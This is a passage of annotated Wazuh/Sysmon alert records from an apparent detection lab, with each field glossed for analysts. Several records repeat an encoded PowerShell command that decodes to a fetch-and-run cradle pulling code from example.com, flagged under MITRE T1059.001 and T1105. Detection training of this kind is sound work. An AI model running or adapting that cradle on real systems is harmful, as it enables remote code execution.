rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 28 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534221.1120995 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:15.7536912Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282677 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:14.714
ProcessGuid: {94294ddc-bcde-680a-d90a-000000000e00}
ProcessId: 11988
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcdc-680a-d60a-000000000e00}
ParentProcessId: 8684
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:14.714 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcde-680a-d90a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11988 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcdc-680a-d60a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 8684 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 32 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534221.1129062 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:15.9842219Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282678 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:15.968
ProcessGuid: {94294ddc-bcde-680a-d90a-000000000e00}
ProcessId: 11988
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_blnnlgfs.rwq.ps1
CreationUtcTime: 2025-04-24 22:36:15.968
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:15.968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcde-680a-d90a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11988 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_blnnlgfs.rwq.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:15.968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 29 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534221.1131831 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:19.7512986Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282717 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:17.032
ProcessGuid: {94294ddc-bce1-680a-dc0a-000000000e00}
ProcessId: 12012
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcde-680a-d90a-000000000e00}
ParentProcessId: 11988
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:17.032 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bce1-680a-dc0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12012 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcde-680a-d90a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11988 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 33 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534221.1139902 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:19.9724799Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282718 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:19.900
ProcessGuid: {94294ddc-bce1-680a-dc0a-000000000e00}
ProcessId: 12012
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_igv42wmh.ctb.ps1
CreationUtcTime: 2025-04-24 22:36:19.900
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:19.900 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bce1-680a-dc0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12012 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_igv42wmh.ctb.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:19.900 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 30 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534222.1142671 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:22.1640650Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282752 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:21.060
ProcessGuid: {94294ddc-bce5-680a-df0a-000000000e00}
ProcessId: 10556
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bce1-680a-dc0a-000000000e00}
ParentProcessId: 12012
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
